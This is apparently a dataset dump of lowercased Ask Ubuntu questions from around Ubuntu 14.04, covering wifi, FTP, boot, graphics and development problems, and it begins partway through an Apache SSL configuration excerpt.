close notify alert from client . when you need a different shutdown # approach you can use one of the following variables : # o ssl-unclean-shutdown : # this forces an unclean shutdown when the connection is closed , i.e . no # ssl close notify alert is send or allowed to received . this violates # the ssl/tls standard but is needed for some brain-dead browsers . use # this when you receive i/o errors because of the standard approach where # mod_ssl sends the close notify alert . # o ssl-accurate-shutdown : # this forces an accurate shutdown when the connection is closed , i.e . a # ssl close notify alert is send and mod_ssl waits for the close notify # alert of the client . this is 100 % ssl/tls standard compliant , but in # practice often causes hanging connections with brain-dead browsers . use # this only for browsers where you know that their ssl implementation # works correctly . # notice : most problems of broken clients are also related to the http # keep-alive facility , so you usually additionally want to disable # keep-alive for those clients , too . use variable `` nokeepalive '' for this . # similarly , one has to force some clients to use http/1.0 to workaround # their broken http/1.1 implementation . use variables `` downgrade-1.0 '' and # `` force-response-1.0 '' for this . browsermatch `` msie [ 2-6 ] '' \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 # msie 7 and newer should be able to use keepalive browsermatch `` msie [ 17-9 ] '' ssl-unclean-shutdown errorlog -- > [ fri jul 04 16:15:17 2014 ] [ error ] [ client 127.0.0.1 ] attempt to invoke directory as script : /var/www/cgi-bin/ i hope , i 'll get solution of my problem..
491659	vmware workstation ca n't start automatically at startup	i want to run vmware workstation and have it start a guest machine automatically when starting up ubuntu . unfortunately i tried to add vmware -x my.vmx to startup applications , and also this method , but none of them works : vmware silently does not run at startup , and there is no entry containing vmware either in /var/log/boot.log or /var/log/dmesg . what can the problem be ?
491663	14.04 on dell inspiron 11 ( 3137 ) touch screen intermittently recognized	sometimes when i reboot , the touch screeen on my dell inspiron 11 3000 series ( 3137 ) is not recognized . no touch gestures work . i reboot and re-test two to several times , then it starts working again . running ubuntu 14.04 lts 64-bit
491665	how to make unity responsive ?	i really like the unity interface . the usability , the look and especially the search . but the search got less and less responsive . in 14.04 i have to wait quiet some time before results appear ( semi recent core i5 with 8gb ram ) - btw : online results are already disabled and videos and music are disabled in the indexing settings . i have a huge music and a large photo collection which needs no indexing and do n't have to apear in the search results , neither does my ( not that large ) video collection . the only thing i 'm interested in is that my installed programs and my other documents are indexed and searched . any hints on how to speed it up and remove the unnecessary stuff ? are there good alternatives ? i would love to keep the starter and also the search design , but maybe some other program / adon can be hooked in to use it .
491669	window remembers selected language	is there any way to remember selected language for particular window ? for example : i typed text with language # 1 , then switch to another window - typed text with language # 2 , and then switched back to to first window and my language automatically switched back to language # 1 .
491671	problems with fillable pdf in libreoffice writer ?	i am trying to create a fillable pdf form for work in libreoffice writer . it works just fine in writer when i test it out , however when i export it as a pdf and open in adobe reader it no longer functions the same way . for instance , i have date fields with drop-down calendars ; these are replaced by simple text input boxes in the pdf version of the file . another example , i have numerical fields ; these also become text boxes in the pdf . what is causing this ? how do i fix it ? i want the pdf file to look and work like the .odt file . any insight is appreciated ! thanks , laya
491678	âerrors were found while checking the disk for /â , no /tmp mounting error	i 've been recently experiencing following error during every time i boot into ubuntu : errors were found while checking the disk drive for / . however everything seems to work file once i choose to ignore the message , by pressing it . note that it does not say `` serious errors ... '' and does n't report an error , such as `` /tmp could not be mounted '' as described in posts such as ubuntu 14.04 not booting after error message . /tmp could not be mounted or this i 've been using 14.04 since may/2014 alongside windows 7 without any problem till recently this started . gnome-disk-utility smart data & self test does n't show any error . i 'm worried about health of my hard disc as it holds some important chunk of data . it would be great if someone could help me out on this , thanks in advance ...
491681	gui not working in hp pavillion 15-n221so notebook pc	i 've installed ubuntu 14.04 lts on the above mentioned laptop . when i try to boot it gives the message about low graphics mode . the desktop does n't appear at all . the cli seems to be working fine , as far as i can tell ( i am very new to linux and any cli ) . i 've tried this : low graphics mode , but the system got jammed and i could n't type the last command . since i 've done this i do n't get the low graphics mode -notice , but after submittting the passphrase ( for file system encryptin ) and and after ubuntu has loaded i get a black screen . ctrl+alt+f1 gets me to the cli , which seems to still work ok . i also tried this : http : //askubuntu.com/a/218095 . when following these instructins , in the 3rd step , i get a question that in english ( i use finnish version ) would go somewhat like this `` in continuing the file system will move into read- and write - state . continue ? '' after i answer yes , the boot starts but ends with just a few lines which are the following : fsck - util-linux 2.20.1 fsck - util-linux 2.20.1 /dev/sda1/dev/mapper/ubuntu -- vg-root : clean , 181102/60547072 files , 4854111/242 56544 blocks was not cleanly unmounted , check forced . /dev/sda1 : 302/62248 files ( 15.6 % non-contigous ) , 53814/248832 blocks mountall : fsck /boot [ 794 ] p채채ttyi tilakoodilla 1 '' p채채ttyi tilakoodilla 1 '' would be in english `` ended with state code 1 '' or `` ended with status code 1 '' i also tried this http : //askubuntu.com/a/141607/300438 , but after running the first command i get an empty screen with some instruction in the bottom and i do n't know what to do next . thank you in advance .
491684	problem with wifi : connection lost on closing laptop 's lid	i am having a weird problem with my laptop wifi , it does not have any problems when i 'm working on it also if i leave the laptop lid open it does not have any problems or when the screen turns off but if i closed the laptop lid the connection to the wifi network is lost within 10 minutes alexander @ alexander-pc : ~ $ ifconfig wlan0 wlan0 link encap : ethernet hwaddr 70 : f3:95 : e8:36:35 inet addr:192.168.2.4 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :72f3:95ff : fee8:3635/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:54751 errors:0 dropped:0 overruns:0 frame:0 tx packets:38151 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:64134836 ( 64.1 mb ) tx bytes:4594568 ( 4.5 mb ) i have ubuntu 14.04 x64 i used to have the same problem even on previous ubuntu version but not on windows . my wifi encryption is any ideas ?
491691	printer brother mfc-7360n ca n't print on lan	i 'm trying to set my network printer 'brother mfc-7360n ' on my lan . all laptops are using ubuntu 14.04 , and i 've installed the cups and lpd drivers from brother , but i ca n't print on lan . the printer shows that i can add the printer , see the cartridge status , but when i send something to print nothing happens , and i get no warnings or errors . i 've followed a lot of forums and posts but it 's no good .
491693	how to resolve `` typeerror : can not call method 'push ' of null ''	i 'm a new qml programmer and i found my self in this problem that when i want to call a new page when clicked on a button it says : typeerror : can not call method 'push ' of null i 've tried everything i know to resolve this but still nothing . here is my code : import qtquick 2.0 import ubuntu.components 0.1 import `` components '' mainview { objectname : `` mainview '' applicationname : `` com.ubuntu.developer..ecolover3 '' automaticorientation : true width : units.gu ( 48 ) height : units.gu ( 60 ) pagestack { id : pagestack component.oncompleted : push ( page0 ) page { id : page0 title : i18n.tr ( `` bem vindo à aplicação do ecolover '' ) visible : false text { id : entrada text : qstr ( `` caro cliente , < br > aqui poderá contrloar os seus gastos de energia < /br > '' ) } column { anchors.margins : units.gu ( 3 ) spacing : units.gu ( 3 ) anchors.fill : parent image { anchors.horizontalcenter : parent.horizontalcenter source : `` /home/diogo/ecolover_teste2/components/ecolover_com_stroke.png '' } button { anchors.horizontalcenter : parent.horizontalcenter text : i18n.tr ( `` page one '' ) onclicked : pagestack.push ( page1 , { color : ubuntucolors.orange } ) } button { anchors.horizontalcenter : parent.horizontalcenter text : i18n.tr ( `` entrar no ecolover '' ) onclicked : pagestack.push ( qt.resolvedurl ( `` pagina_inicial.qml '' ) ) } } } page { title : `` rectangle '' id : page1 visible : false property alias color : rectangle.color rectangle { id : rectangle anchors { fill : parent margins : units.gu ( 5 ) } } } } }
491694	unable to install ubuntu studio	hi guys i wanted to know if i am doing something wrong i downloaded ubuntu studio 14.04 from the website and the download file is not corrupted i have verified it on vmware . i burnt the iso to pendrive but when i tried to boot from it does n't shows the options , i selected live boot then it shows the ubuntu logo and loader for sometime and just reboots the system to grub menu..
491695	can not access a file using java.io.fileinputstream	i am working with java servlets and i need to access a file trail.xlsx within the java code using java.io.fileinputstream class , for windows we have to add the drive letter but here we do n't have any drive letter to get the full qualified path for file like c : \something\trial.xlsx and even i have tried following combinations /home/trail.xlsx /media/win7/trail.xlsx ( moving the file to the following locations first ) why are n't these addresses working with java is it that java does not support linux drive paths ? ? or there is other way out ? ? i need to read that file only within java and it says java.io.filenotfoundexception : /home/trail.xlsx thank you for you valuable time ... .
491697	can i share a private ip address on wi-fi and ethernet ?	i have a laptop which is usually on ethernet and has a static ip . sometimes i need to take it away from my desk and use the wifi . how can i make the ethernet and wi-fi use the same private ip address ?
491699	learning material for boot configuration	i really need a comprehensive , yet clearly explained reference regarding how all the boot configuration , structure and execution comes together in linux and how it is compared to windows and all the nuts and bolts of the multiple boot mode in terms of boot loader installation , re-installation and configuration . i 'm just sick of loosing gigs of data because of lack of essential knowledge so any links/references will be appreciated ! best regards , mike
491700	use different desktop theme for one application	i 'm using the evolve theme for ubuntu and i 'm happy with it . all applications work well with this theme except one , ubuntu software center . the text is not readable with this theme ( white text on light grey background ) . every time i need to use usc i have to change the theme and then change it back . is it possible to tell ubuntu to use the ambiance theme for usc only ? i tried adding env gtk_theme= '' ambiance '' to the exec line in the .desktop file but it did n't have any effect whatsoever .
491703	problem with ubuntu installtion	i have tried twice to install ubuntu 14.04 using a live dvd on my laptop hp pavilion zv600 . twice after taking too much time for installation it reaches a point where i get the following msg : ... source error id 134107 was not found when attempting to remove it ... i am stuck . any insights would be appreciated .
491704	rtl8723ae not connecting to netgear wgt624 on ubuntu 14.04	i recently installed ubuntu 14.04 64 bit on my computer and have been unable to connect to my wireless network on netgear wgt624 with wpa2-psk [ aes ] encryption . i have been able to connect to a neighbor 's unsecured wifi , nonetheless . i have tried downloading the dropbox drivers but received errors when compiling . i am able to connect using my other devices . i have been scouring the internet trying to find a solution but have come up empty handed . does anyone have any idea on how to solve this issue ? below is some information that might be useful . $ sudo lshw -c network -numeric *-network description : ethernet interface product : ar8161 gigabit ethernet [ 1969:1091 ] vendor : qualcomm atheros [ 1969 ] physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 10 serial : 00:8c : fa:23 : ef : eb capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : c8500000-c853ffff ioport:3000 ( size=128 ) *-network description : wireless interface product : rtl8723ae pcie wireless network adapter [ 10ec:8723 ] vendor : realtek semiconductor co. , ltd. [ 10ec ] physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 20:68:9d : e6:58 : c3 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8723ae driverversion=3.13.0-30-generic firmware=n/a ip=192.168.99.159 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:2000 ( size=256 ) memory : c8400000-c8403fff edit : the results of sudo iwlist scan is shown below for the network to which i am trying to connect : cell 10 - address : 00:14:6c:25:24:5c channel:11 frequency:2.462 ghz ( channel 11 ) quality=70/70 signal level=-38 dbm encryption key : on essid : '' karlmarx '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 12 mb/s ; 24 mb/s ; 36 mb/s bit rates:9 mb/s ; 18 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000271e2db29 extra : last beacon : 56ms ago ie : unknown : 00084b61726c4d617278 ie : unknown : 010882848b960c183048 ie : unknown : 03010b ie : unknown : 2a0100 ie : unknown : 32041224606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk preauthentication supported ie : unknown : dd0900037f0101000eff7f ie : unknown : dd1a00037f030100000000146c25245c02146c25245c64002c010e08 here are some data from the logs jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) starting connection 'karlmarx' jul 4 14:05:14 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jul 4 14:05:14 peta networkmanager [ 952 ] : < info > networkmanager state is now connecting jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0/wireless ) : access point 'karlmarx ' has security , but secrets are required . jul 4 14:05:14 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 4 14:05:14 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0/wireless ) : connection 'karlmarx ' has security , and secrets exist . no new secrets needed . jul 4 14:05:14 peta networkmanager [ 952 ] : < info > config : added 'ssid ' value 'karlmarx' jul 4 14:05:14 peta networkmanager [ 952 ] : < info > config : added 'scan_ssid ' value '1' jul 4 14:05:14 peta networkmanager [ 952 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' jul 4 14:05:14 peta networkmanager [ 952 ] : < info > config : added 'auth_alg ' value 'open' jul 4 14:05:14 peta networkmanager [ 952 ] : < info > config : added 'psk ' value ' < omitted > ' jul 4 14:05:14 peta networkmanager [ 952 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 4 14:05:14 peta networkmanager [ 952 ] : < info > config : set interface ap_scan to 1 jul 4 14:05:14 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning jul 4 14:05:14 peta wpa_supplicant [ 1138 ] : message repeated 7 times : [ wlan0 : ctrl-event-scan-started ] jul 4 14:05:14 peta wpa_supplicant [ 1138 ] : wlan0 : sme : trying to authenticate with 00:14:6c:25:24:5c ( ssid='karlmarx ' freq=2452 mhz ) jul 4 14:05:14 peta kernel : [ 1088.256023 ] wlan0 : authenticate with 00:14:6c:25:24:5c jul 4 14:05:14 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating jul 4 14:05:14 peta wpa_supplicant [ 1138 ] : wlan0 : trying to associate with 00:14:6c:25:24:5c ( ssid='karlmarx ' freq=2452 mhz ) jul 4 14:05:14 peta kernel : [ 1088.270479 ] wlan0 : send auth to 00:14:6c:25:24:5c ( try 1/3 ) jul 4 14:05:14 peta kernel : [ 1088.272682 ] wlan0 : authenticated jul 4 14:05:14 peta kernel : [ 1088.272882 ] rtl8723ae 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap jul 4 14:05:14 peta kernel : [ 1088.272884 ] rtl8723ae 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap jul 4 14:05:15 peta kernel : [ 1088.274219 ] wlan0 : associate with 00:14:6c:25:24:5c ( try 1/3 ) jul 4 14:05:15 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating jul 4 14:05:15 peta kernel : [ 1088.378204 ] wlan0 : associate with 00:14:6c:25:24:5c ( try 2/3 ) jul 4 14:05:15 peta kernel : [ 1088.482293 ] wlan0 : associate with 00:14:6c:25:24:5c ( try 3/3 ) jul 4 14:05:15 peta kernel : [ 1088.586379 ] wlan0 : association with 00:14:6c:25:24:5c timed out jul 4 14:05:15 peta wpa_supplicant [ 1138 ] : wlan0 : ctrl-event-ssid-temp-disabled id=0 ssid= '' karlmarx '' auth_failures=1 duration=10 jul 4 14:05:15 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected jul 4 14:05:25 peta wpa_supplicant [ 1138 ] : wlan0 : ctrl-event-scan-started jul 4 14:05:25 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning jul 4 14:05:26 peta wpa_supplicant [ 1138 ] : wlan0 : ctrl-event-ssid-reenabled id=0 ssid= '' karlmarx '' jul 4 14:05:26 peta wpa_supplicant [ 1138 ] : wlan0 : sme : trying to authenticate with 00:14:6c:25:24:5c ( ssid='karlmarx ' freq=2452 mhz ) jul 4 14:05:26 peta kernel : [ 1099.537265 ] wlan0 : authenticate with 00:14:6c:25:24:5c jul 4 14:05:26 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating jul 4 14:05:26 peta kernel : [ 1099.552096 ] wlan0 : send auth to 00:14:6c:25:24:5c ( try 1/3 ) jul 4 14:05:26 peta wpa_supplicant [ 1138 ] : wlan0 : trying to associate with 00:14:6c:25:24:5c ( ssid='karlmarx ' freq=2452 mhz ) jul 4 14:05:26 peta kernel : [ 1099.564258 ] wlan0 : authenticated jul 4 14:05:26 peta kernel : [ 1099.564407 ] rtl8723ae 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap jul 4 14:05:26 peta kernel : [ 1099.564410 ] rtl8723ae 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap jul 4 14:05:26 peta kernel : [ 1099.567680 ] wlan0 : associate with 00:14:6c:25:24:5c ( try 1/3 ) jul 4 14:05:26 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating jul 4 14:05:26 peta kernel : [ 1099.671815 ] wlan0 : associate with 00:14:6c:25:24:5c ( try 2/3 ) jul 4 14:05:26 peta kernel : [ 1099.775903 ] wlan0 : associate with 00:14:6c:25:24:5c ( try 3/3 ) jul 4 14:05:26 peta kernel : [ 1099.879990 ] wlan0 : association with 00:14:6c:25:24:5c timed out jul 4 14:05:26 peta wpa_supplicant [ 1138 ] : wlan0 : ctrl-event-ssid-temp-disabled id=0 ssid= '' karlmarx '' auth_failures=2 duration=20 jul 4 14:05:26 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected jul 4 14:05:36 peta wpa_supplicant [ 1138 ] : wlan0 : ctrl-event-scan-started jul 4 14:05:36 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning jul 4 14:05:39 peta networkmanager [ 952 ] : < warn > activation ( wlan0/wireless ) : association took too long . jul 4 14:05:39 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jul 4 14:05:39 peta networkmanager [ 952 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets jul 4 14:05:39 peta networkmanager [ 952 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . jul 4 14:05:39 peta networkmanager [ 952 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . jul 4 14:05:42 peta networkmanager [ 952 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > inactive jul 4 14:05:44 peta networkmanager [ 952 ] : < warn > no agents were available for this request . jul 4 14:05:44 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : need-auth - > failed ( reason 'no-secrets ' ) [ 60 120 7 ] jul 4 14:05:44 peta networkmanager [ 952 ] : < info > networkmanager state is now disconnected jul 4 14:05:44 peta networkmanager [ 952 ] : < info > marking connection 'karlmarx ' invalid . jul 4 14:05:44 peta networkmanager [ 952 ] : < warn > activation ( wlan0 ) failed for connection 'karlmarx' jul 4 14:05:44 peta networkmanager [ 952 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jul 4 14:05:44 peta networkmanager [ 952 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ]
491705	reducing size of sage after building from source	i built the maths software sage from source onto my ubuntu server . it now takes up 4.1gb of space in my /opt . i am near the limit of my partition size and was wondering if anyone knew what i can remove to free up space without breaking the program . note , the first level of the sage directory tree is : bin c_lib ext fpickle_setup.pyc makefile module_list.py sage build doc fpickle_setup.py mac-app manifest.in module_list.pyc setup.py
491712	ubuntu 14.04 64-bit a a vm in vmware workstation 9.0 no alt-gr keys on french keyboard	using vmware workstation 9.0 i install a new vm with ubuntu server 14.04 64-bit iso . i install just the core , i use a french keyboard and during setup i enter the detect part of my keybord . then when i logged in , all is well the keyboard is in french layout ( azerty ... ) , the shift keys are working ( characters with accents ) . the problem is that i ca n't access the alt-gr keys like | or [ ] etc ... for a server with just a command line it 's a bit annoying . i do multiple test with : sudo dpkg-reconfigure keyboard-configuration but still nothing ! anybody can help ?
491713	setup vsftp and upload file	i am trying to setup an anonymous ftp server on ubuntu . i installed vsftpd with upload directory /srv/ftp the following lines to /etc/vsftpd.conf : local_root=/srv/ftp listen=yes anonymous_enable=yes local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key anonymous_enable=yes anon_upload_enable=yes anon_other_write_enable=yes anon_mkdir_write_enable=yes anon_world_readable_only=no seccomp_sandbox=no allow_writeable_chroot=yes unfortunately when i ftp in then and try to put a file i get a '553 could not create file ' . i read that the issue could be with rights on the upload dir so i added ftp user to the directory and writing rights using chown and chmod : sudo chown ftp : ftp /srv/ftp sudo chmod 777 /srv/ftp however , then i ca n't ftp in anymore and i get 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) . i also added the flag allow_writeable_chroot to the config file which did not help . when i do chmod 2775 i can login but everytime i put something i get a 553 . i tested this with locally as well with 'ftp localhost' thanks for any help
491714	how uid and gid related to permission ?	i want to know how uid and gid is related to permissions/owership ? is there any default/permanent id for root ? what are standard values for uid and gid ?
491715	get rid of orange edge around radio buttons	i am currently working on a gtk+ 3 program and i constantly encounter this rendering mistake . the edges around radio buttons are drawn orange which is especially visible when the window is passive and the buttons turn grey . is this a ubuntu-bug or related to my computer ? follow the bug report https : //bugs.launchpad.net/ubuntu/+source/ubuntu-themes/+bug/1297302
491717	can not login on my ubuntu 14.04	i left my laptop on for a night while i was downloading some songs but when i woke up it was shutdown and when i tried to restart it i came to the login window normally . now when i try to login as a guest a black screen flashes with some message and i am thrown back to the login window again [ even as a guest user ] . when i try to go to the shell by pressing ctrl+alt+f1 then login . i see this error message . -- bash : /usr/lib/command-not-found : /usr/bin/python3 : bad interpreter : permission denied i tried to set permissions to my home directory using this command : sudo chmod -r ug+rwx /home/xor but it did n't helped and i saw the same error again . [ as above ] i also tried this command chown xor : xor .xauthority this time no message but problem remained unresolved . please help me as i am very new to ubuntu as i installed it 2 weeks ago and have no idea what is happening with my system . [ and sorry for bad image ]
491719	graphics ( hdmi ) driver not defined	i have a dell vostro 3500 which used to run ubuntu just fine ( 14.04 ) . i 've switched to kubuntu ( 14.04 ) to give it a go and i have a problem with the hdmi . there is no option to output sound via hdmi . it seems like it 's not defined . this is what lspci returns : '' vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) '' i 've also tried intel graphics installer . any ideas what 's wrong ? feel free to ask any additional information .
491722	getting a public ip that is different for my ubuntu server then my homenetwork	okay so here 's the thing , i live in sweden and got fiber with a internet speed of 100/100 mb/s . they way my network is setup right now is that i got a modem which is hooked up to my router which goes to all the computers in the house . but here 's the problem , i do n't want my server to have the same public ip as my other computers in my house . i 've achived this before by using another old router i got and hooking it into the modem which got 10 ports , and this gave me a different public ip . this would work perfectly for me if it was n't that the router is pretty bad so it slows down the speed of the internet with a great amount . so my guesses are to do something like to put my server directly into the modem and not use any router at all and use some sort of program on the server , or use some kind of setting on my router ( asus rt-ac66u ) . those are my guesses but i really do n't know how to do it , so any help would be really nice ! but if there is n't any way of doing this i could get another router , but i do n't feel like spending extra money on a router good enough to handle 100/100 mb/s . if there are any more info that i forgot needed please point it out in the comments ! thanks !
491728	is there any java decompiler gui	i am using eclipse and just lost some .java files from my ubuntu 14.04 now i am left out with just .class files ( the files were important ) i know about java decompiler but jd-eclipse is not working . i need a java decompiler for recovering my files or is there any other way to recover deleted files ( not like extundelete ) to recover my .java files . if no then is there any easy to use java decompiler
491729	how to completely reset ubuntu networking settings ?	i would like to reset my network settings and services entirely as if starting from scratch . i had recently installed ubuntu a few days ago , and deleted a important boot file . after installing ubuntu again , my network was not auto configured like my previous install . and my network did not work . then i think i messed up the network settings too much in attempting to fix it , and now i would like to completely reset network settings . my system is an old hp pavilion dv8 running ubuntu 14.04 and windows 8.1 dual boot .
491730	java process stays open	i like playing minecraft but after i close minecraft , the java process stays on and i need to go into the system monitor to kill it or else there will be a lot of java processes on slowing down my game . how do i get the java processes to end after i close minecraft ?
491737	touchpad toggling on and off upon login	i have a quite annoying problem with my touchpad on ubuntu . when i log in , the touchpad keeps toggling on and off . the toggling stops immediately when i press a key on my keyboard . sometimes it becomes enabled and sometimes disabled . it seems like it 's about timing . if it becomes disabled , i have to synchronize the fn+f3 ( touchpad toggle ) with the physical toggle button . to clarify , this means that i have to make sure that both the keyboard touchpad setting is enabled and the physical as well . this is just a flaw that i would like to correct if it 's possible . it happens every time i have had the lid closed . if i just lock the computer or restart it without closing the lid , the touchpad works as expected . i have ubuntu 14.04 right now , but it was also present on my 13.04 installation , but the toggling was a lot quicker there . i 'd say it toggles about every 0.2 seconds now . this is not present on my windows installation ( dual boot ) . i have not found any questions regarding this on the forum . please inform me if i have left out any important details . system specifications ubuntu version : 14.04 lts ( also in 13.04 ) window manager : gnome 3.8 ( gdm ) touchpad brand : synaptics drivers : proprietary laptop brand : msi ge60 0nc
491738	automate two commands in sequence on login ( killing nemo )	in a june4 reply on an askubuntu post regarding when cinnamon is installed , unity desktop “smears” ( does n't refresh ) and shows no wallpaper madrang wrote that : there is no need to purge cinnamon . you just need to kill nemo and start nautilus instead . $ killall nemo $ nautilus – madrang jun 4 at 4:45 well , the answer was brilliant , and it works for me 'as-is ' ; however , i find i have to perform the same two commands every time i reboot my computer . i 'm an intermittent ubuntu unity ( and cinnamon ) user , converting my system to these two environments full time . i suspect i only need to load nautilus for the unity desktop , since cinnamon appeared to work properly before : is there a way that anyone knows of to automate or default to this condition as soon as i log into the unity environment ( trusty ) ? if so , how ? thanks for your time , cs
491742	how to install oald8 on ubuntu 14.04 x64 ?	i am running ubuntu 14.04 lts x64 i have an oxford advanced learners ' dictionary and that comes with a disk that contains a digital dictionary . i do n't know how to install it on my computer . please help me out . thanks in advance . : )
491750	force enable hardware acceleration in firefox	currently , in about : support ( firefox 30 ) the `` graphics '' section states the following : now , i know that firefox has ( for whatever reason ) disabled the hardware accelerated features for linux users . however , as stated in this site , it should be possible to force enable it . so far , i have : set layers.acceleration.force-enabled and layers.offmainthreadcomposition.enabled to true . set the environment variable moz_use_omtc=1 it does n't work , and the hardware acceleration remains disabled . is there another way to force-enable hardware acceleration ( performance is horrible on my computer ) ? or am i just doing it wrong ?
491751	i can not boot into windows 8 after installing ubuntu	i partitioned my windows 8 hard drive and installed ubuntu in one of the partitions . now i canât boot to windows , in either legacy or uefi mode . what has gone wrong ?
491757	how to make the desktop fit my monitor in 14.04 ?	i have a dell xps 8700 and just installed 14.04 . the desktop is too large for my monitor and i can not see the apps on the left side of the screen unless i make them as large as i can and the top of the page where the file options and time and settings are off the screen . i have changed the display to its lowest setting,1280x720 on a 1920x1080 toshiba tv monitor just to see some of the controls . thanx
491758	passphrase problem after installing xubuntu	i have just installed xubuntu on an old ( but quite decent ) xp multimedia dell inspiron 9400 pc to give to my son . this is our first experience with linux . installation seemed to go well . i had opted for disk encryption during installation . however when i tried to enter the `` passphrase '' i keep getting `` no key for this passphrase '' . am i doing something wrong ? e.g . do i need to provide the username as part of the passphrase etc ?
491761	developing mir gui on ubuntu server	the question is : how would i develop a c++ gui application using mir on ubuntu server ? i 've installed all the packages that relate to mir : mir-demos , unity-system-compositor , libunity-mir-dev , ubuntu-desktop-mir and maybe more . all i have are mirclient , mircommon , mirplatform , mirserver folder in /usr/include which do n't correspond to any of the examples presented on the mir official page .
